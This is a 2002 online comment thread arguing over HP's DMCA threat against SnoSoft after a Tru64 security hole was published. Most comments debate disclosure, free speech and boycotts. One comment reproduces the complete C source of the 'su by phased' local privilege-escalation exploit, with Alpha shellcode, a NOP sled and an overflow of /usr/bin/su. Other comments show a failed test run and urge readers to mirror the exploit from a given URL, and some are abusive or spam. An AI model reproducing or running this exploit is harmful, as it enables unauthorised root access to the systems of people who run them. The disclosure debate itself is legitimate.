A month later, a master key for your lock's exact model leaks out.
Every thief within a hundred miles has a key to your front door, they just have to notice that it fits to rob you blind.
Fortunately, a neighborhood watch group got wind of the leaked key, and started publicising it heavily, saving countless people from break-ins.
So who does the lock manufacturer go after, on learning of this problem?
Not the engineer who stupidly designed a master-keyed lock for the general public...
Not the thieves who make use of this information...
Not even the problem itself, which would take only a limited recall and almost no effort to correct...
Instead, they go after the neighborhood watch group, on some shaky grounds about loss of confidence in the company.
It strikes me as a *DAMNED* good thing that we only have such f'd up laws relating to computers, rather than physical security. Oh, wait, one *could* read the DMCA as applying to physical security. Oops. Time to go install a 2x4 on a latch-and-hinge across my front door.
Anyone know if this exploit would fit on a t-shirt?
Looks like the DMCA is being used to shake people down with threats of jail time just for exercising free speech. Very sad indeed. This is a stupid law that will be tough to correct. Now congress is being paid off to pass more stupid laws that are turning this country into a facist state. It seems to me that McCain had it right with trying to get soft money banned.
These statements are probably obvious and redundant but I figured I would add another statement to the list. This is a question of freedom and educating the American public. The needs of the people outway the needs of the rich few.
Nah, don't worry about being bombed. The U.S. government only bombs poor countries, especially ones with deep water ports.
Gosh! An AC post with the subject "FUCK HP" gets moderated to +5 Insightful. I agree with this post, but it hardly so "Insightful" because it's too obvious to most readers here.
Just in case few of us here don't know about him. You can find his homepage here
, and in his Bio you can find:
" Hewlett-Packard Corporation - 2000 to Present
Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."
So he's in position to speak up in this case.
Note: I don't know if it's redundent but I'm sure some people would like to know. I don't ask for any mod point.
Lots of people are going to be looking forward to your scoop on this (I among them). Good luck getting to the bottom of it, and hope your dinner wasn't spoilt by the news.
RE:Security warning draws DMCA threat - http://news.com.com/2100-1023-947325.html.
Due to the unethical and ill advised measures you have taken against SonoSoft, I have lost faith in HP and will immediately stop using HP/Compaq products and services.
On top of that I will advise everyone else to do the same.
I will subsquently dump any and all HP shares.
You simply are not the kind, I'd like to deal with nor support in any way.
Former customer and Carly fan...
not only can their CEO's cheat their shareholders
not only cannot their CEO's cheat their shareholders
How did this happen? What's the whole story? Inquiring trolls want to know!
The knowledge that su suffers from stack overflow is sufficient to allow the malicious to gain root access, without the source code - of which there appears to be three versions floating around. Squashing one doesn't appear sufficient to stop even the skiddies. I have one of those free-to-individuals Tru64 UNIX licenses, and guess what? Root access denial is not effective in preventing me from copying anything. If HP allows backups of this nebulous copyrighted information, then they have already subscribed to root access circumvention. Wait a minute, the CDROMs that Tru64 UNIX comes on aren't protected either, and mounted CDs don't default to root read only...
Maybe the best thing that could happen would be for HP/Compaq to file suit under the DMCA. Not
the best thing for the DMCA mind you...
I just removed "HP-UX" and "Tru64" from my resume, and cancelled my unshipped order on a HP laserjet. HP can have my business back 1 year after they retract their usage of the DMCA.
I dont see the point of taking HP to task for it. .. whoopdee doo.
.. what we need is a change in the law.
.. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.
.. why cant I do it with the applications I use and store my depply personal information (from baby pictures to tax and health records) on?
It's a waste of time. Even if they back off
Please
Hackers can expose findings and report them to companies
Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:
a) Hackers who find vulnerabilites must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.
b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.
c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.
Is there any way for you to use your publicity to bring something like this about?
At least try. I hate the fact that curiousity is now a crime. I am allowed to take apart my car and see how it works
Thanks,
Johan
This is like the FBI arresting ou for a felony because you found a dangerous subway stop in Newyork, and told everyone not to use it so thoy wouldn't get hurt!! it makes no sense! Reece,
There was already slim to no chance that I'd ever consider True64, but there goes any chance in hell that it'll be used on my servers. Goodwork HP.
I can see it here, US Government is progressively inventing laws that ensures:
....Imagine, no violence, no crime, no hunger...a perfect world!
Only the Government can investigate crimes.
Only the Government can test, examine, uncover defectives in consummer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional right are being intruded.
That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.
What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.
IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed(brains were sperated from their body) or terminated(becomes food for others). It's like Matrix, but this time some humans control everything.
Lots of people consider America to be the freest country in the world. Rules like reguarding free speeck in Europe are one of the reasons why most people don't consider European countries nearly as free. DCMA is bad but at least at the core of our legal system we have a 1st amendment which prevents attempts at prior restraint, and so over the long term HP couldn't win this sort of thing. Europeans will never know that sort of security.
Don't say it...don't say it...I'm warning you...
Use Linux.
Damn, I said it.
Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.
<rant />
Clearly some sort of political action is required. I suggest:
1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.
2. Abolish corporate personhood (same methods).
3. Abolish the lobby industry.
4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.
We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...
Comment removed based on user account deletion
I hope you can point them in the right direction, Bruce... and I hope whoever owns this defect has a patch out by tomorrow at noon. =) I know if I owned that code, and I saw this article, I'd be working night and day to get a resolution...
Of course, this is probably Compaq (a "wholly owned subsidary" of HP) that we're talking about, so maybe my company isn't going to hell as fast as some might think.
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
none of the less-than & greater-than signs made it through the filter :)
Look at the for loops
There are some truly dumb things in a standard install of Tru64 Unix that have been fixed for ages in Linux, *BSD, Solaris, etc. One thing in particular came up (and was fixed in Linux, etc.) in 1996! I pointed it out to someone at Compaq over six months ago and was told that it was being worked on, but two patchkits later, there's no change. They're adding some things, slowly, like a secure mkstemp command that was added to 5.1A with PK1. But overall, the reaction from Compaq (and now HP) to security problems is underwhelming at best.
This'll be great for Black Hats now their 0-day will stay 0-day even longer.
There won't need to be much use for the [initial-intent of the] DMCA, as give it another few years or less and the companies that follow actions such as those by HP won't have software worth copying anyway.
The DMCA clearly stifles 'innovation' in-key with a Microsoft Windows 98 installation on every new home computer.
Suddenly it becomes obvious that Apple don't need losers, black sheep and computer illiterate users to promote their products.
Like-wise reporting a fault in SSH will give you a round-of-applause, and not a 5 year gaol/jail term and certain bankruptcy.
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
Judge Kaplan didn't let EXCEPTIONS WRITTEN INTO THE DMCA ITSELF prevent him from ruling against the DeCSS defendants.
Don't count on judges to uphold the law.
(Unless of course, the side that is right is also the side with the most money - which is rarely the case)
Just because it CAN be done, doesn't mean it should!
Computers are now being used extensively in the medical field for everything from life-support, diagnosis, treatment, medical records and billing.
Hacks on billing systems will just cause financial damage, but hacks on the other types of systems CAN KILL.
Hacking SCADA and industrial control systems can KILL and/or cause MAJOR property and environmental damage.
Security holes can literally TAKE one's life.
Just because it CAN be done, doesn't mean it should!
I just tried that on a Tru64 box (after putting all the greater/less thans back in).
./get_root /bin/su by phasedA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ;-)A AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA@
It didn't work:
(snip!)>
payload 15120b
buffer 8238b
su: Unknown id: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
snip! - lameness filter
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Memory fault
(snip!)>
Here's the version of the box:
OSF1 *********.au V5.1 732 alpha
Suppose I've discovered a critical security flaw in Tru64. Under threat of the DMCA, I can't simply announce what this flaw is. Question 1: Who can I tell that I don't need permission from HP to do so?
:)
Now, the DMCA doesn't prohibit me from exercising my capitalistic itches, and I've written an (obviously third party) patch to this flaw. Question 2: The DMCA prevents me from telling how my patch works and what it does, and probably prevents me from releasing the source code to my patch, but does it prevent me from selling the patch for a great profit?
Question 3: Could I apply a license to the patch such that I was not responsible for any damage the patch does, and not culpable if the patch say, didn't do anything at all?
Question 4: Wouldn't the DMCA prevent anyone from (legally) discovering if the patch worked at all?
Question 5: Would this constitute "bad faith" in HP's eyes?
I understand how tempting it may be to walk away. To "make a statement" by walking away. Resist it. Teaching HP to be good open source citizens is, in many ways, like trying to raise a willful teenager. Just because you try to teach them right from wrong doesn't mean they will do the right thing every time. That doesn't make you a failure, and it doesn't mean they don't hear you and can't learn. The words you say can make an impact, year after year, if you let them. Your silence will be heard only for a moment, then forgotten.
Children pack up their toys and leave when they don't like the game. Mature adults recognise that sometimes the game goes against them, but if the game is important enough, you keep playing.
Hang in there - we need you there.
Watch what happens to HPQ tomorrow. I think that this news will be significantly negative for HPQ. Note that after Adobe filed charges against Sklyarov, the price of ADBE went down.
... and I don't even own any to begin with (I'm a short seller).
I know I'm going to be selling a few thousand shares of HPQ tomorrow
Once information regarding an exploit is published, its propagation is inevitable, especially among the "black hat community." While legitimate customers are legally forbidden to devise a workaround for this exploit, the script kiddies will soon be employing it.
Server administrators can only defend from vulnerabilities they're aware of. Loyal customers, not shareholders, should take precendence, Hewlett-Packard.
Do you like German cars?
#include <stdio.h>
/* 0x140010401 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
They defend themself the best they can
The American Way is about hypocrisy, and kickbacks for corrupt politicians (Fritz Hollings et al) and major automobile manufacturers
Algorithm for breaking into HP boxen:
1) take the system administrator to the pub
2) give him lots of beer
3) ask him the root password
4) go 'crack' the machine
Actually things like this are good - the demonstrate the stupidity of DMCA and may aid it's demise.
In these days, the main power of the proprietary Unix operating systems (like HP/UX, Irix, Tru64 AIX, and so on) is that they are highly optimized for the hardware they run on. Although you probably can run *BSD or Linux on most of these platforms, they are still inferior products. On the other hand, those operating systems (and the only exception is Solaris) are old dinosaurs, with ugly configurations so different from one vendor to the other, bad C compilers, strange filesystem layout. From the productivity's point of view, running only one operating system on all platforms, if possible, is the best thing you can do. And when you know that your great vendor might let you unpatched for months and not even telling you, this is the best reason to abandon those operating systems in favour of *BSD or Linux. Sad is that it might happen to exist some closed-source application that can only run on that Unix and not on your favourite free operating system, but for many other environments, HP just pushed all away from their operating systems.
I wonder if this is their official policy from now on, or it is just related to Tru64 to make all switch to HP/UX where they might still let you find and publish vulnerabilities?
From the article:
"HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com and to take all steps necessary to prevent the further dissemination by SnoSoft and its agents of this and similar exploits of Tru64 Unix," Ferson wrote, according to a copy of the letter seen by CNET News.com. "If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith."
How about this:
"SnoSoft hereby requests that you cooperate with us to remove the buffer overflow exploit from Tru64 Unix and to take all steps necessary to prevent the further dissemination by HP and its agents of this and similar exploits of free speech,"
"If HP and its members fail to cooperate with SnoSoft, then this will be considered further evidence of HP's bad faith."
"What difference does it make who finds and reports a bug?"
We lost a great deal of medical knowledge after WWII when we threw out the data gathered by Dr. Josef Mengele. This medical knowledge was the result of human experimentation on prisoners; some of it will remain lost until someone repeats the unethical human experiments involved.
So in answer: it has *always* mattered what source information; the ends never justify the means.
"The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself."
In this case, it did not. It spoke for a security consulting company, where the publisher of the exploit was a principal. If the exploit had merely spoken for itself, then we wouldn't be having this discussion, because HP would not have had a name to which it could attach their threat of a lawsuit.
The ends in this case were not even knowledge: they were commercial gain. Knowledge was just a side effect of the process of obtaining the commercial gain. If the commercial gain could have been obtained without the exposure of the security flaw, then there likely would not have been an exposure at all.
Am I gald the vulnerability was exposed? Yes.
Do I think HP is playing CYA? Yes.
Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? No.
-- Terry
Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
- oakbox
Not just answers, the correct questions.
Perhaps the answer to these draconian laws is to force their hand and have them start jailing large numbers of people for trivial stuff. How long before the politicians start to see that they have helped no one with these laws?
It appears that HP has truly gone over to the Dark Side.
One can see many parallels between Anakin and Carly...wonder how she looks in black.
We need a DMCA database that lists companies who invoked / threatened with the DMCA, and specifics about it. That way, we could simply query whom to boycott. Sort of like ORBS for DMCA Companies. (We do need to have the details listed for every case because the dmca might be invoked in legitimate cases like software piracy, too.)
me too! right on! vote with your dollars, fight the good fight. you ain't missing much: most movies stink and there isn't much good music coming out these days.
no movies, no CDs, no meat, no god - no guilt
My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anoything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.
How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?
nice... the old, infamous method of Security through Obscurity has been replaced with a new, much safer one -- Security through DMCA. Way to go!
Anyone who stores copyrighted material on a Tru64 system, and is counting on the system as a technological measure to control access to their work, can sue Snosoft for violating DMCA.
Alan Cox wasn't worried about Linus or someone else on the kernel team suing him. It's the millions of other people who use Linux, that he can't afford to trust.
So even if HP backs down, Snosoft's people aren't necessarily out of the woods. Realistically, they probably are. But they can't be 100% sure. That's how bad this law is.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
You must publish a working exploit, or the company will just say "that security hole is only theoretical", and blow off the entire thing. Publishing only the details of a security hole has been tried many times, and almost every time, the vendor has said "we aren't going to bother to fix that, it is only a theoretical vulnerability".
I wonder if the slashdot effect applies to telephone numbers too. = ]
I recommend on about $2-5m IT purchases a year. If we all tell Carly (in nice positive ways) how much this stupid decision is going to cost them, they'll hopefully see the light, and give up. This is a shame, as I've personally been a HP owner since 1995 and had exemplerary service from them for the longest time. Compaq on the other hand has been busy screwing customers of mine since 1990. Their "service" was and always has been a joke where I live. When we paid a large wad of cash in 1997 for a bunch of Digital gear, well, Compaq bought them. I knew then we had signed a multi-million dollar mistake.
....
But I have no doubt now that they've threatened a lawsuit, a lawsuit we will have. Hopefully, it'll clear up the boundaries of the awful DCMA.
Anyway, HP, here's my "fuck you":
1997: $4,000,000 (at least - a huge deal)
1998: $1,000,000 (mostly desktops, changed from CPQ to HP cos I liked HP)
1999: $4,500,000 (start of a nice juicy project)
2000: $7,500,000 (the tail end of nice juicy project)
2001: a tiny bit less than $2,000,000
2002: $3,500,000 (so far)
2003: ?
2004: ?
2005: ?
2006: ?
2007: ?
2008: ?
2009: ?
2010: ?
2011: ?
2012: ?
2035: ?
2036: I retire.
Remember, HP, good friends are hard to come by, enemies are forever.
Andrew
Andrew van der Stock
I have long detested HP for the way they do things...Overly insular in technology and availability of information, stodgy os's that are slowing down, tight grip on coding, you name it...Since IBM went on their linux kick(truly only for their bottom line, they have no souls to save and never do something because it is right....in reality) I have seen a huge increase in the number of purchases at our company of their equipment, we have basically discarded HP and Comcrap, and I feel the load lifting. Now if we can dump all those DELLS that some moron purchased......
Probably because the EU has no "First Amendment"
We may not have it, but we have the European Court of Human Rights, which can be seized by any citizen (EU or not) and have his/her rights enforced. This court just sticks to the Declaration of Human Rights, which include free speech and plenty of other goodies absent from the US constitution. Even nazi sh*ts are granted rights their countries denied them on behalf of "hate speech" laws and such.
I also believe we, Europeans, enjoy a pretty nice form of freedom, perhaps even more than the citizens of the USofA. At least I don't risk much being shot by a gun-toting neighbour who thinks I'm a terrorist because I speak a foreign language of have friends from diverse ethnic backgrounds.
It's about time you Americans stop thinking Europe is some sort of communist dictatorship... Because from here, the USA sure don't look like the place to be if one wants to be free!
Just my 0.02
-max
-- It's always darker before it goes pitch black.
True, this is on a product that the company undoubtedly wants to retire as soon as possible, but the message this is sending about its priorities goes considerably wider.
I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.
-- Matthew - matthew.gream@pobox.com, http://matthewgream.net
HP can turn this thing around, by coming up with a serious and community accepted solution to this huge mess that has emerged from the DMCA.
.. wouldnt they be in real trouble?
First (and this may be a harder/difficult plan), they can say they had no choice but to under the DMCA. (this will undermine the DMCA's role as a credible piece of legislature while allowing HP to save face). Any major company that exposes the DMCA for it's true worth is a friend of mine for life.
Second, and most importantly, they can take the initiative and launch an independent non profit system associated with buqtraq or CERT by which hackers can properly submit vulnerabilities viewable to a select community group. The group can then determine whether and when to go public with the information provided the targetted company has reasonable time to prepare and announce a patch. All submittals to the consortium must be given a digitally signed receipt. If the bug report is swept under the rug.. and an exploit is released to the wild, the bug reporter can submit his receipt as evidence that the company at fault chose to ignore a known fault in their product.
If software companies want their rights to be protected they have to take responsibility. If a flaw is found in a GM vehicle, and they dont issue a recall or give free repairs
This level of accountability has GOT to be enforced in the software industry. (When was the last time you heard of a recall in the software industry? God knows it's been needed countless times)
Nobody can be held legally or criminally liable for unintentional flaws in their product, but refusal to take action should be firmly dealt with.
If a company is deliberately refusing to fix a known vulnerability in their product (merely to avoid PR hassles) they are endangering the US economy, shareholder interests, and perhaps even lives. This sort of wreckless behavior is all too common in the software industry.
If HP comes out with a solution for handling security flaws, I believe it will work in their favor. Remember many software flaws are found in their competitor from Redmond's products.
Argh I dont know the point of saying this on slashdot. Like Ms. Fiorina will read this. Nothing said here ever results in any sort of action. Well ok maybe with the exception of freeing Dmitry Sklyarov. Legislation like DMCA pass with no opposition. Basically, geek views are treated like being less than 1/425'th of what the population wants.
Sigh.
-Johan
What would the effect of an EULA stating that
"I as a copyright holder have no right to use _appauling_legislation_ against any person or entity using this software"
Would that be a stupid thing to do or is it not even possible.
That could, at least in the long run become some sort of a insentive for customer to use my software (granted it's any good) or am I wrong.
No, not really.
;)
It's a niche OS, so it gets less publicity than most other OS's - Solaris, Debian etc.. - so there are possibly fewer known OS specific issues, but the vast majority of the bugs and loopholes that affect other un*x systems affect Tru64 as well thanks to the amount of shared code involved. Tru64 is no more or less vulnerable to bof's and other security issues than any other OS ( except maybe OpenBSD et al that are designed to be secure).
Having said all that it's pretty obvious that HP/Compaq want rid of it, so migrating to a new platform is prolly a good idea anyway
The DMCA is a law that is not enforsable outside of US boundaries, since the internet is international, and it is causing huge problems to the open software industry.
HP is one example where instead of fixing a high risk security bug, decides to use the law to hide the bug and have their customers computers at the risk of the security hole, then I gues the way the law works if that HP customers can sue HP for selling defective software and hiding its bugs.
But this is nonsence, the correct way and ethical way to proceed is to fix the bug, don't use the DMCA as a method of hiding the bugs, and let people know about the security problem so that they fix the bug as soon as a fix becomes available if it does.
The DMCA is a law that need to be overthown, same as the DRM laws that legislators are trying to pass.
The DMCA made many things that were legal and ethical legal, like posting research done on a product is ilegal now, reverse engineering which is needed for compatability purpuses is now ilegal, this is coorporate bullshit, it is time to challenge this nonsence laws, the problem is that the legal process to chalenge a law is very costly and it is out of reach for most of us.
So I guess one way around the bad laws, is using the good laws against it, for example getting organized and having lists of countries that enforce the DMCA, and the ones that do not.
I am planning on putting up a website in Mexico to avoid problemas with the DMCA, since right now even if I am correct on an issue, if a large corporate industry were to sue me for whatever reason, I would be destroyed do to the expenses involved in the defense process.
Let me refrase that, if anyone of us were to be sued by whatever reasons by a large corporation, we would be destroyed, even if we were to win a case, the financial cost alone would be huge.
What is really bad about this is that in the US it takes nothing to be sued (meaning you do not really have to do anything bad at all), reading the articles on newsgroups, slashdot, and other places. For example a russian programmer (Dimitro ) was arrested for writing code in Russia, in the USA, even though the code was legal in Russia, in other words the DMCA is going to be pushed beyond borders even in countries that do not support the DMCA, this is unacceptable.
In the case of HP, the person that found the bug did HP a favor, since it gave HP a chance to fix the bug, and HP saves money on debuging the OS since it is done for free, someone the wanted to do harm would use the exploit, and post it in a cracker newsgroup anonymous. But HP instead of saying thanks, threatens this person with a lawsuit. This is completely insane for a technology company.
www.consultorlinux.com
linux consultant since 1992
Could be, I agree, but I'd read that as 'full disclosure unless you'd hired us to perform a private audit', which is rather more reasonable.
Greg
(Inside a nuclear plant)
Aaaarrrggh! Run! The canary has mutated!
By doing this HP has just made sure that anyone that finds a real security flaw in their operating system will not publicise the issue. This security through obscurity has been shown to be useless... Even Microsoft now realizes this.
/CPQ machine since I have no idea if there are security problems that HP hindered from getting fixed.
If the item is not fixed when it is first found, and made public then this means that those flaws can easily stay hidden, and propagate into other subsystems in such a ay that fixing it at a later date may become impossible.
If the problem is not made public, there is a very good chance that real "black hat" underground distributers of the information may have and use the exploits. This could mean that real system admins are kept in the dark while their boxen are rooted from under them. This is because the admins are not made aware of the issues as a result of this action by HP.
As a result, I would much less be willing to use/trust a Tru64 / HP
--
Time is on my side
Ah.. but once they say "it is only a theoretical vulnerability" the person that published the info can say... "Nope: here is the code"; or even better, can say in the initial publication "here is the description... and we have working code; which will be published in 14 days from now" and send the vendor the working code...
Even Microsoft has learned its lesson... {there is still space for improvement... but they are getting better in these situations]
--
Time is on my side
Well, its around 4 Am, or earlier, in the States right now. I wonder how much sleep the HP execs are getting :)
Trying to dictate when someone is allowed to say something is in violation of the first amendment. If you live in a country where that doesn't apply then I guess it sucks to live there.
The real solution is for the vendors themselves to be more proactive and actually search for bugs and vulnerabilities. This isn't a perfect solution, because there is no such thing. Until such time that software is mathematically perfect there will always be bugs (in other words there will always be bugs). What companies like HP need are teams of programmers and legitimate crackers whose job it is to thrash the code as hard as possible to expose vulnerabilities before the criminal crackers find it. If they're too cheap to do this then fuck them and the horse they rode in on.
If you REALLY want to put an end to crap like the DMCA the very best things you can do are vote and donate money to groups like the EFF and ACLU. Put your money where your mouth is.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
An official statement from the Phreaking.org crew (PoC) for HP:
"All you motherfuckers are gonna pay, You are the ones who are the ball-lickers. We're gonna fuck your mothers while you watch and cry like little bitches. Once we get to Palo Alto and find those HP fucks who are making that ruckus, we're gonna make 'em eat our shit, then shit out our shit, then eat their shit which is made up of our shit that we made 'em eat. Then you're all fucking next."
su.c is mirrored at phreaking.org - We would like to encourage everyone outside of the US to host and link to phased's exploit.
US Feds and Compaq-HP force Google and other large spiders to remove code!!!!
:
:)
If you try diligently, the half a million dollar sourc code secret (of which was binary at first) and has three dirivitive versions, was DELETED FROM GOOGLE CACHE!!!!!
I dare you to find any left of the original in Google! I tried every reasonable length substring.
The info to search for in google is
"
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
"
good luck!
if you try to find source code you will fail too.
the substring +"su by phased" yileds NOTHING on google now as of 7:46 EST 2002 07 31
Phreaking.org is taking a stand though.
osama bomb kill alpha 66 chelsea quell cuba mt weather raul castro allah africa liberation omega 7 cia nsa dia
sanford and son slashdot missle fox news carly terror muslim pope gun clinton deez nuts toyota rabin arafat abu nidal
Surely, if anyone in the US has anything like this that they want to make public, they can find someone outside the country to post it for them ? Or, of course, post it yourself via some external (to the US) media.
I read that the guy who posted the exploit is a non-American and says that he's not worried about the DMCS and HPs action because it doens't apply to him. And, of course, he's absolutely right !
The same applies to any American who wants to publish some code that includes some patent or other - just publish it from outside the US - it's not difficult. I think this is how the encryption module was distributed for Linux (don't know if it still is because the patent has now expired, I think ).
The point is that yes, the DMCA is awful, but getting round it is child's play if only you look outside the box !
There are not that many Tru64 boxes laying around. Good thing that this place lets you sign up for shell accounts where you can test drive your programs.
i didn't mean to start a whole US -:- EU : polemic, just stating that some laws in the states (DMCA is but one of them) have been bought by large companies. And that's wrong!
The first amendment wasn't written in this or even the last century, but in completely different times.
Some of these practices probably also happen overhere, we're no less capitalistic.
Though most US readers probably think the EU is one federal country with a centralised administration. This is of course not so.
Every member state is constantly weary of supranational legislation infringin on national liberties.
We value our freedoms just as much as every other ordinary western citizen.
We don't ADORE the EU, but it tries to bring countries together.
BTW: a UK judge just declared an anti-terrorism law illegal! I think there's hope yet.
-- Try getting on iVillage in S. Arabia?
-- "We can the bomb the world to pieces, but we can't bomb it into peace!" - Michael Franti
The Awful Truth
I can only assume that most readers on /. work in the computer industry. I make my living in computer security. If this is HP/Compaq's stance, then every report I make will recommend avoiding their products. It is just that simple. Collectively, we have a large voice, we just need to take actions instead of debating.
We have removed HP from our vendor list until HP changes their position. We hope other companies will follow suit. If you do, make sure you notify them of the fact.
Ask me about my vow of silence!
Now I finally understand WHY it is that HP thinks they can sue. I was honestly baffled.
Lasers Controlled Games!
Only criminal hackers will have exploits!!
'Good one!'
The problem with slashdot is that most of its users were bullied and stuffed into lockers as kids!
In an internal email (which I am hesitant to directly quote in full), Kent Ferson said that this article was published w/o contacting HP to confirm/deny facts. He assures us that "the primary facts of the article are wrong".
Also note that the merger is only a few months old at this point. This is basically a Compaq response from the Tru64 management team, and hopefully will not tarnish HP's reputation when it comes to HP-UX and Linux. I would believe that "old HP", and the new HP a year or so down the road, would handle this much differently.
europe is largely socialist , this american can see the difference in socialism and communism . I for one dont like high government spending , so I dont prefer socialism .
I am also not in constant fear of being shot . That comment is so absurd and obviously lacking in personal experience and insight . If I bring up all of the wars in Europe , is state sponsored gun-toting somehow better.
I think my point of view on guns is directly related to my point of view on socialism , personal choice is better than government mandate.
Please refrain from generalist statements that only further ignorance.
You know, in many ways, you're right. In so very many ways, the original poster is also right.
